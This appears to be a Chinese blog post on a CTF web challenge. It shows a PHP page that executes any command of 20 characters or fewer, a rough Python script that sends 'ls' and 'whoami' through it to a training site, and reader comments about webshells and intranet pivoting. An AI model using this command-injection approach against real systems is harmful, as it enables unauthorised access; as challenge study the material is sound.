一个做不来的WEb题目
一个做不来的WEb题目
https://473831530.trains.virzz.com/
<?php
error_reporting(0);
/**
*
* Hint: CTF都没打过或者Writeups都没有观摩过,加什么群?
*
*/
$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
mkdir($sandbox);
chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 20) {
exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);
然后看到crazy 和life 老哥发了一篇文章给我。唔。
https://www.anquanke.com/post/id/87203
看到这个文章之后,贼tmd 牛皮。牛皮牛皮。
然后一直改不来py 后面life 大黑阔提醒了一下,唔。不要再这个沙盒里面去测试。而是跳到上层。唔,
改出了一个垃圾py
# -*- coding:utf8 -*-
import requests as r
import hashlib
url = 'https://473831530.trains.virzz.com'
# 查询自己的IP
ip = r.get('http://ipv4.icanhazip.com/').text.strip()
sandbox = url + 'sandbox/' + hashlib.md5('orange' + ip).hexdigest() + '/'
reset = url + '?reset'
cmd = url + '?cmd='
build2=['ls ../ >../23.txt','ls >../10.txt','whoami >../12.txt']
print build2
for i in build2:
s = r.get(cmd + i)
print '[%s]' % s.status_code, s.url
s=r.get('https://473831530.trains.virzz.com/sandbox/23.txt')
print s.text
有趣,有趣,还要内网渗透。真的这么6的么、后续发吧


13Ling
2018年8月9日 下午8:00
楼主,你的代码我用不了,提示第四行有问题,可以解疑一下吗?
print("")
2018年8月9日 下午9:34
可能题目换了吧。但是思路是一样的啊
kratos
2018年8月10日 下午2:40
https://www.anquanke.com/post/id/87203 这个网址里面用的是什么工具啊
print("")
2018年8月10日 下午2:54
那个就是手写的代码啊。没有了啊
meo9y
2018年8月27日 下午10:21
大佬,求出内网渗透。webshell会传的。
print("")
2018年8月28日 下午8:02
flag 在内网机器中的
haha
2018年8月31日 下午4:20
dalao 我内网扫了半天没思路能提示下不